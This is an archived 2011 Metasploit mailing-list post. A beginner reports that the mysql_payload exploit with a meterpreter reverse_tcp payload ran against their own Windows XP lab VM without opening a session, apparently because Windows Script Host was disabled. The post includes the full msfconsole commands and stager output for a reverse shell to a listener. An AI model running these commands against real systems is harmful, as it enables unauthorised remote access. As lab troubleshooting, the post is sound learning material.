Home page logo
/

metasploit logo Metasploit mailing list archives

payload meet wsh failure?
From: Linan Wang <wang.linan () gmail com>
Date: Wed, 8 Jun 2011 22:17:10 +0100

Hi list,

I have played with the mysql_payload exploit for a full day but got to this
trouble:
... the exploit successfully uploaded a file and defined a mysql udf, which
enabled next step payload deliver
... no matter what payload i choose, no session was created. I look into the
target machine's even log, it reported Failure Audit: Attempt to execute
Windows Script Host while it is disabled. I guess there is advanced someway
to manipulate the payload. (yes, it's my 1 day with msf)

msfconsole log:
============================================================
use windows/mysql/mysql_payload
set RHOST 192.168.1.67
set PASSWORD 123456
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
============================================================
output:
============================================================
[*] Started reverse handler on 192.168.1.2:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] sys_exec() already available, using that (override with
FORCE_UDF_UPLOAD).
[*] Command Stager progress -   1.47% done (1499/102246 bytes)
[*] Command Stager progress -   2.93% done (2998/102246 bytes)
....
[*] Command Stager progress -  98.19% done (100400/102246 bytes)
[*] Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
============================================================
the target is a clean windows xp vm without any anti-virus installed.

any suggestion? thx

LW
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
  • payload meet wsh failure? Linan Wang (Jun 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]